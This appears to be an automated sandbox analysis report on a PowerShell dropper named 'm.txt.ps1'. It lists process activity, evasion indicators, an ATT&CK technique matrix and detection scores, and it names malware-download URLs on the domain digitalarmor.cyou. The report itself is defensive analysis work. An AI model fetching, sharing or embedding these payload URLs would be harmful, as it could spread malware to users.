Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb| source: powershell.exe, 00000000.00000002.1528845992.0000027DCEB70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1527982461.0000027DCE934000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.1529563538.0000027DCEC4B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1527982461.0000027DCE934000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1506260544.0000027DB47E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1529158000.0000027DCEBBB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1527982461.0000027DCE934000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1506260544.0000027DB47E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1528845992.0000027DCEB70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbivers\DriverDataNUMBER_OF_PROCESSORS=2OS=Windows_NTPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64ProgramData=C:\ProgramDataPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot source: powershell.exe, 00000000.00000002.1506260544.0000027DB47E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbQ source: powershell.exe, 00000000.00000002.1528845992.0000027DCEB70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1529563538.0000027DCEC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbX source: powershell.exe, 00000000.00000002.1528845992.0000027DCEB70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1528845992.0000027DCEB70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.pdb source: powershell.exe, 00000000.00000002.1507538284.0000027DB7EF2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbu source: powershell.exe, 00000000.00000002.1528845992.0000027DCEB70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.pdbhP source: powershell.exe, 00000000.00000002.1507538284.0000027DB7EF2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ws\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1529158000.0000027DCEBF6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: Possible double extension: txt.ps1Static PE information: m.txt.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4271Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5595Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: powershell.exe, 00000000.00000002.1529158000.0000027DCEBBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jjfh4dlp\jjfh4dlp.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD0D5.tmp" "c:\Users\user\AppData\Local\Temp\jjfh4dlp\CSC54EE39D9867F4A06B1E0C15F7422FD6E.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
21
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
m.txt.ps17%VirustotalBrowse
m.txt.ps13%ReversingLabsWin32.Dropper.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://digitalarmor.cyou/1234/bfoiuywh98ertyh/897654.zipp100%Avira URL Cloudmalware
http://digitalarmor.cyou100%Avira URL Cloudmalware
https://digitalarmor.cyou/1234/bfoiuywh98ertyh/grewg542.zip100%Avira URL Cloudmalware
https://digitalarmor.cyou100%Avira URL Cloudmalware
https://digitalarmor.cyou/1234/bfoiuywh98ertyh/897654.zip100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
digitalarmor.cyou
172.67.212.107
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://digitalarmor.cyou/1234/bfoiuywh98ertyh/grewg542.zipfalse
    • Avira URL Cloud: malware
    unknown
    https://digitalarmor.cyou/1234/bfoiuywh98ertyh/897654.zipfalse
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://www.cloudflare.com/learning/access-management/phishing-attack/powershell.exe, 00000000.00000002.1507538284.0000027DB87A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1507538284.0000027DB89C5000.00000004.00000800.00020000.00000000.sdmpfalse
      high
